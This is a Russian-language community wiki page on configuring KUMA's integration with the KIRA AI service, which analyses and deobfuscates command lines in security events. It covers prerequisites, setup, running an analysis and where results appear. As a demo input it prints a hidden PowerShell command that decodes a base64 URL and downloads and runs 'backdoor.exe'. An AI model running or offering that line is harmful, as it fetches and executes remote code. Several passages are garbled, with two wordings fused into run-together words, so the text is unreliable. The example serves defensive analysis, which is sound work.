Настройка интеграции с KIRA и примеры использования
Информация, приведенная на данной странице, является разработкой команды pre-sales и/или community KUMA и НЕ является официальной рекомендацией вендора.
Официальная документация по данному разделу приведена в онлайн-справке на продукт:
https://support.kaspersky.ru/kuma/4.0/294800
Видео по работе KIRA и преимуществаключевые - преимущества:
https://box.kaspersky.com/f/48a6de7a26044d9ea60c/
Kaspersky Investigation and& Response Assistant (далее — KIRA) — это облачный сервис на базе искусственного интеллекта для анализа событий информационной безопасности.
KIRA выполняет детальный разбор командных строк и скриптов Windows и Linux с возможностью деобфускации, формирует краткое описание их назначения и предоставляет аналитикаманалитическую инструментыинформацию, необходимую для оперативногоускорения декодированиярасследования инцидентов и деобфускации строк выполнения, извлечённых из событий безопасности в режиме реального времени. Данное решение оптимизирует процесс приоритизации инцидентов, сокращая время на анализ сложных данных, и снижает квалификационные требования для аналитиков первого уровня, что повышает общую эффективность системы реагирования на инциденты.алертов.
КлючевыеДля преимущества:использования сервиса ИИ KIRA необходимо:
УскорениеНаличиецикладействующейпринятиялицензиирешений;с модулем AI.СнижениеНаличиезависимостифайлаотсертификатавысокойвэкспертизыформатесотрудников;
Для получения сертификата и пароля обратитесь к сотрудникам Лаборатории Касперского или представителям партнера.
Настройка интеграции KIRA доступна только пользователю с ролью Главный администратор.
КакНастройка пользоватьсяинтеграции с KIRA
Чтобы настроить интеграцию с KIRA:
После сохранения параметров будет показано доступное количество токенов. Количество токенов обновляется ежедневно.
Интеграция с сервисом KIRA успешно настроена. Анализ будет доступен для всех событий, как новых, так и уже полученных.
Выполнение анализа с помощью KIRA
После того как интеграция настроена, можно выполнять анализ команд или скриптов с помощью KIRA.
Для примера создадим новый алерт, но Вы также можете использовать события из сработкиуже сформированного алерта:
SELECT * FROM `events` WHERE DeviceEventClassID = '4688' AND DeviceHostName = '<имя тестовой рабочей станции>' ORDER BY Timestamp DESC LIMIT 250
powershell -NoProfile -NonInteractive -ExecutionPolicy Bypass -W Hidden -Command "$s = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2E3Mzk2ZDYxY2FmZmUxOGE0Y2ZmYmIzYjQyOGM5YjYwLmNvbS9kL2JhY2tkb29yLmV4ZQ==')); iwr $s -OutFile backdoor.exe; Start-Process .\backdoor.exe"
Чтобы выполнить анализ:
Альтернативный способ отправки запросов в KIRA: на панели инструментов в карточке события в раскрывающемся списке Проанализировать с помощью KIRA выберите поле, значение которого вы хотите проанализировать.
Чтобы ознакомиться с отчетом об деобфускации нажмите Действия и выберите Посмотреть отчет по деобфускации.

Возможность редактирования запроса перед отправкой в KIRA обеспечивает дополнительный уровень контроля над конфиденциальностью данных. Это особенно важно в случаях, когда анализируемые строки кода содержат чувствительную информацию, такую как персональные данные, учетные записи или ключи доступа.
ПоПосле кнопкевыполнения анализа результат будет отображаться в карточке события на вкладке ДействияАнализ KIRA и будет доступен для просмотра всем пользователям с доступом к функциональности Проанализировать с помощью KIRA.
Результаты анализа KIRA хранятся в кэше в течение 14 дней.
Также можно посмотретьпросмотреть отчетрезультат оанализа деобфускации:в разделе Диспетчер задач в свойствах задачи Запрос в KIRA. При нажатии на название задачи, в контекстном меню будут доступны следующие действия:
Помимо отправки запросов в KIRA при расследовании алертов запросы можно отправлять непосредственно из раздела События.
Примеры команд для анализа KIRA
Команды не рабочиенерабочие все ссылки заменены, но это не отменяет перепроверку и аккуратность использованияиспользования!
ссылкаСсылка на примеры - примеры:
https://github.com/KUMA-Community/kuma_content/blob/main/kira/usecases.md













